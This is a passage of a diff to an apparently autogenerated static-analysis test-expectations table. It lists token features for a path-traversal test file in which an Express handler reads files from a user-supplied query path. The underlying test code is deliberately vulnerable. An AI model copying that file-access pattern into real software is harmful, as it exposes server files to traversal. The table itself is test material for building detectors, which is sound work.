relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:256:6:256:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:256:6:256:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:256:6:256:17 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:256:6:256:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:256:6:256:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | calleeImports | fs | @@ -8961,6 +76257,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:256:19:256:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:10 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:10 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:10 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:10 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:10 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self = something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self = something() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self = something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self = something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:7:258:24 | self = something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:22 | something | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:22 | something | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:22 | something | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:22 | something | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:22 | something | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | exceptional return of something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | exceptional return of something() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | exceptional return of something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | exceptional return of something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | exceptional return of something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | something() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:258:14:258:24 | something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:14 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:14 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:14 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:14 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:14 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relativ ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relativ ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relativ ... , path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relativ ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relativ ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:27 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:27 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:27 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:27 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:27 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:36 | pathModule.relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:36 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:36 | pathModule.relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:36 | pathModule.relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:36 | pathModule.relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:29:260:36 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:29:260:36 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:29:260:36 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:29:260:36 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:29:260:36 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:260:38:260:41 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:38:260:41 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:38:260:41 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:38:260:41 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:38:260:41 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | calleeImports | path | @@ -8970,6 +76341,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:260:38:260:49 | self.webroot | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:260:43:260:49 | webroot | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:260:43:260:49 | webroot | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:260:43:260:49 | webroot | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:260:43:260:49 | webroot | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:260:43:260:49 | webroot | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | calleeImports | path | @@ -8979,6 +76355,42 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:260:52:260:55 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | 